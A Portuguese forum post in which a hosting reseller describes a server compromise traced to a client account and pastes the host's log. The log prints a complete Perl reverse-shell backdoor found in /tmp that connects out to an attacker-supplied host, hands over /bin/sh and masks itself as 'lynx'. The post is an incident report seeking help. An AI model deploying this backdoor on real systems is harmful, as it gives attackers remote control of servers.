Eu estou com um grande Problema eu tenho uma revenda de hospedagem onde eu hospedo os meus clientes...
ontem o servidor deu problemas o host disse que uma conta de um cliente da minha revenda instalou um backdoor... e detonou todo o servidor... todos os sites ficaram fora e eles tiveram q formatar o servidor... ele me passou o log e me pediu um explicação minha! Eu afirmei que eu não havia instalado nada pois eu prezo pela segurança dos meus clientes e os meus sites... E fato esse meu cliente ele não tem acesso ao cpanel apenas eu tenho acesso! então como poderia eu mesmo instalar alguma coisa para me prejudicar ... sem lógica ... depois do stress eu fui investigar eu peguei o log e eu tinha recebido um email ontem do site no qual havia dado o problema... o meu cliente tentou acessar o painel administrativo e pediu a alteração de senha isso foi às 16:56 e o horário do problema com o servidor foi as 16:59 eh impossivel não ligar uma coisa com a outra pois os horários batem...
Segue o log
It does appear that a backdoor was installed in the server via /tmp:
root@server01 [/tmp]# strings back
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
root@server01 [/tmp]# ls -al back
-rw-r--r-- 1 djturism djturism 541 May 4 16:59 back
It appears the kernel was last updated on Thursday, May 7th 2009:
root@server01 [/tmp]# uname -a
Linux server01.hostidc.info 2.6.18-128.1.10.el5PAE #1 SMP Thu May 7 11:14:31 EDT 2009
i686 i686 i386 GNU/Linux
In the recent hacks we have seen where backdoors were installed such as the one on your
server, it was because of the explanation given here:
http://www.cpanel.net/2009/09/cpanel-se ... ility.html
This appears to be the case for this server as you are using a very old kernel and the same
backdoor was installed. Since this isn't cPanel related you will need to contact a security
consultant/company to look over and you should reinstall the server as there is no telling
what files may be compromised on the box.
o djturism eh o meu cliente...
segue a mensagem do meu email.
Olá,
Uma requisição de alteração de senha foi recebida para sua conta Dj Turismo. Para alterar sua senha, você deve enviar este token para verificar se a requisição é legítima.
O token é e10..........
Clique na URL abaixo para informar o token e proceder com a alteração de sua senha.
segue o linkkk
........
eu estou me reunindo com o meu cliente agora... e depois eu posto alguma coisa... eu gostaria de alguma informação mais detalhada!
Desde já obrigado pela comunidade...
